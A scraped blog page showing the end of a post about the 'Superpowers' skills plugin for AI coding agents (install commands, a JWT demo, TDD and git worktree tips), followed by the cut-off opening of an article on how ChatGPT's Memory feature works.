--tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; 
--tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-size: 0.85em;">/plugins</code><span> </span>→ search "superpowers" → Install</td></tr><tr data-source-line="74" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: 
; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><strong style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 
0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; color: rgb(0, 0, 0);">Cursor</strong></td><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><code style="font-family: Menlo, Monaco, Consolas, "Courier New", monospace; color: rgb(0, 0, 0); background-color: rgb(240, 240, 240); padding: 0.2em 0px; 
border-radius: 3px; --tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-size: 0.85em;">/add-plugin superpowers</code></td></tr><tr data-source-line="75" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; 
--tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><strong style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; 
--tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; color: rgb(0, 0, 0);">Gemini CLI</strong></td><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; 
--tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><code style="font-family: Menlo, Monaco, Consolas, "Courier New", monospace; color: rgb(0, 0, 0); background-color: rgb(240, 240, 240); padding: 0.2em 0px; border-radius: 3px; --tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-size: 0.85em;">gemini extensions install https://github.com/obra/superpowers</code></td></tr><tr data-source-line="76" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; 
--tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; 
--tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><strong style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; color: rgb(0, 0, 0);">OpenCode</strong></td><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 
0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;">Fetch instructions from the repo</td></tr></tbody></table><!--kg-card-end: html--><h4 id="c-i-cho-claude-code-chi-ti-t-">Installing for Claude Code (details):</h4><pre><code class="language-bash"># Option 1: Official Marketplace (recommended)
/plugin install superpowers@claude-plugins-official

# Option 2: Superpowers Marketplace
/plugin marketplace add obra/superpowers-marketplace
/plugin install superpowers@superpowers-marketplace
</code></pre><p>That's it. No extra configuration is needed; your AI now has Superpowers.</p><hr><h3 id="4-workflow-chi-ti-t-7-b-c-t-t-ng-n-code">4. Detailed workflow: 7 steps from idea to code</h3><figure class="kg-card kg-image-card"></figure><hr><h3 id="5-demo-tr-c-v-sau-khi-c-superpowers">5. Demo: before and after Superpowers</h3><h4 id="scenario-th-m-authentication-cho-api">Scenario: adding authentication to an API</h4><p><strong>BEFORE (without Superpowers):</strong></p><pre><code class="language-text">User: "Add JWT authentication to the API"

Claude Code:
→ Installs jsonwebtoken
→ Creates an auth.js middleware
→ Adds it to every route
→ Forgets the tests
→ Forgets refresh tokens
→ Forgets error handling for expired tokens
→ Hardcodes the secret in the code
→ You spend another 2 hours fixing it
</code></pre><p><strong>AFTER (with Superpowers):</strong></p><pre><code class="language-text">User: "Add JWT authentication to the API"

Claude Code (with Superpowers):

━━━ BRAINSTORMING ━━━
"I have a few questions before we start:"
- Access token + refresh token, or access token only?
- How long until tokens expire?
- Where is the secret stored? An env var?
- Do you need role-based access control?
- Which routes are public and which are protected?

User: "Access + refresh, 15min/7day, env var,
       with RBAC, /auth/* public, everything else protected"

━━━ DESIGN SPEC ━━━
[Shows the spec section by section for the user to approve]

━━━ PLAN ━━━
Task 1: Setup JWT config + env vars (2 min)
Task 2: Create auth middleware - test first (3 min)
Task 3: Login endpoint + test (4 min)
Task 4: Refresh token endpoint + test (4 min)
Task 5: RBAC middleware + test (3 min)
Task 6: Apply to routes + integration test (5 min)

━━━ EXECUTE (TDD) ━━━
[Each task: write failing test → implement → pass → commit]

━━━ REVIEW ━━━
✓ All tests pass
✓ No hardcoded secrets
✓ Error handling complete
✓ Ready to merge
</code></pre><figure class="kg-card kg-image-card"></figure><hr><h3 id="6-b-n-trong-skills-library">6. Inside the Skills Library</h3><p>Superpowers consists of 14 skills in 4 groups:</p><figure class="kg-card kg-image-card"></figure><h4 id="skill-highlight-test-driven-development">Skill highlight: Test-Driven Development</h4><p>This is the strictest skill: the AI is <strong>required</strong> to follow the process:</p><figure class="kg-card kg-image-card"></figure><p>If the AI writes code before writing a test, Superpowers <strong>deletes that code</strong> and makes it start over, following the process. No exceptions.</p><hr><h3 id="7-subagent-driven-development-ph-n-hay-nh-t">7. Subagent-Driven Development: the best part</h3><p>This feature lets Claude Code run <strong>autonomously for hours</strong> without you having to step in:</p><figure class="kg-card kg-image-card"></figure><p>Each subagent is a "fresh agent": it has no prior context and receives only a clear task description. It is like hiring a junior engineer: give them a solid brief and you get solid output.</p><hr><h3 id="8-philosophy-t-i-sao-superpowers-hi-u-qu-">8. Philosophy: why does Superpowers work?</h3><p>4 core principles:</p><figure class="kg-card kg-image-card"></figure><hr><h3 id="9-systematic-debugging-c-ch-debug-c-h-th-ng">9. Systematic Debugging: debugging methodically</h3><p>When a bug shows up, Superpowers enforces a 4-phase process:</p><figure class="kg-card kg-image-card"></figure><p>Compared with the way AI usually debugs (guess → fix → guess → fix), this approach saves a lot of iterations.</p><hr><h3 id="10-th-c-t-s-d-ng-tips-kinh-nghi-m">10. In practice: tips and lessons learned</h3><h3 id="tip-1-ai-brainstorm-l-u">Tip 1: Let the AI brainstorm long enough</h3><p>Many people rush to skip the brainstorming phase. Don't. This is the phase that makes the biggest difference: the AI asks questions you forgot to ask yourself.</p><h3 id="tip-2-review-plan-k-tr-c-khi-go">Tip 2: Review the plan carefully before saying "go"</h3><p>The plan is the "blueprint" for the AI's execution. A wrong plan → the whole execution goes wrong.
Spend 2-3 minutes reading the plan before approving it.</p><h3 id="tip-3-k-t-h-p-v-i-git-worktrees">Tip 3: Combine it with Git Worktrees</h3><p>Superpowers automatically creates a separate branch for each feature. If the AI heads in the wrong direction, you just discard the branch, and the main code is untouched.</p><pre><code class="language-bash"># Superpowers does this automatically (-b creates the new branch):
git worktree add -b feature/add-auth ../feature-auth
# → Separate workspace, separate branch
# → Failed? Discard it. Nothing to worry about.
</code></pre><h3 id="tip-4-d-ng-cho-task-ph-c-t-p-kh-ng-d-ng-cho-task-n-gi-n">Tip 4: Use it for complex tasks, not simple ones</h3><pre><code class="language-text">✓ Good fit:
  - New features that need design work
  - Large refactors
  - Complex bugs spanning multiple components
  - Migration / Integration

✗ Overkill:
  - Fix typo
  - Rename variable
  - Adding a single simple field
  - Format code
</code></pre><hr><h3 id="11-so-s-nh-v-i-c-c-approach-kh-c">11. Comparison with other approaches</h3><figure class="kg-card kg-image-card"></figure><hr><h3 id="12-k-t-lu-n">12. Conclusion</h3><p>Superpowers is not magic. It is <strong>engineering discipline packaged as markdown</strong> and enforced automatically by the AI agent.</p><p>The core value:</p><blockquote>AI coding agent + Superpowers = a junior engineer with a proper SOP,<br>working 24/7, never skipping tests, never skipping review.</blockquote><p>The 3 most important things I took away after using it:</p><ol><li><strong>Discipline &gt; Intelligence</strong>: the AI is already smart enough; the lack of discipline is the real problem.</li><li><strong>Plan first, code later</strong>: 5 minutes of planning saves 2 hours of fixing.</li><li><strong>TDD is not optional</strong>: when the AI is forced to write tests first, code quality improves noticeably.</li></ol><p><strong>228k</strong> stars on GitHub did not happen by accident. Install it and try it on one feature, and you will see why.</p><hr><h3 id="ngu-n-tham-kh-o">References</h3><ul><li><a href="https://github.com/obra/superpowers">GitHub: obra/superpowers</a>: source code and documentation</li><li><a href="https://blog.fsck.com/2025/10/09/superpowers/">Jesse Vincent's blog</a>: release announcement</li><li><a href="https://discord.gg/35wsABTejz">Discord community</a>: questions and discussion</li><li><a href="https://docs.anthropic.com/claude-code">Claude Code Documentation</a>: official docs</li></ul>
</article>
<article>
<h1>Reverse Engineering ChatGPT's Memory Feature: How It Works Internally and How to Design a Memorize Feature for Your Own Agent</h1>
<p>N.Đ.L — Thu, 25 Jun 2026 03:17:31 GMT</p>
<p></p><h1 id="chatgpt-memory-ho-t-ng-nh-th-n-o-v-c-ch-t-build-memory-system-cho-ai-agent-c-a-b-n"><strong>How ChatGPT Memory Works, and How to Build a Memory System for Your Own AI Agent</strong></h1><figure class="kg-card kg-image-card"></figure><h1 id="t-ng-quan"><strong>Overview</strong></h1><p>You have probably run into this before:</p><p>You open ChatGPT, chat for a while, and ask all sorts of questions about your project. Then you close the browser. The next day you open it again, and the bot treats you like a stranger: <em>"Who are you? What are you working on?"</em></p><p>And you wonder: <strong>Why doesn't it remember anything?</strong></p><p>Then OpenAI shipped the <strong>Memory</strong> feature. ChatGPT now remembers that you like writing TypeScript, that you are building a SaaS product, that you use the Next.js App Router… all without you having to repeat it every time.</p><p>Which raises the question: <strong>What is the mechanism behind that "memory"? Where is it stored? And how would you build an agent with a similar capability?</strong></p><p>In this post I will dig into:</p><p><strong>1. How ChatGPT Memory actually works under the hood</strong></p><p><strong>2. The 4-layer architecture and the 4 types of memory</strong></p><p><strong>3. The step-by-step retrieval flow when a user sends a message</strong></p><p><strong>4. How to build a memory system for your own AI agent</strong></p><p><strong>5. Privacy controls, the part that often gets overlooked</strong></p><p>Let's go!</p><hr><h1 id="1-chatgpt-nh-b-ng-c-ch-n-o"><strong>1. How does ChatGPT "remember"?</strong></h1><p>Before getting into the technical details, I want to clear up a common misconception:</p><blockquote>ChatGPT does not have memory like a human brain. It does not "remember" in any continuous sense. Every request it receives is still stateless.</blockquote><p><strong>So where does that "memory" come from?</strong></p><p>Imagine this:</p><p>You go to see a doctor. 
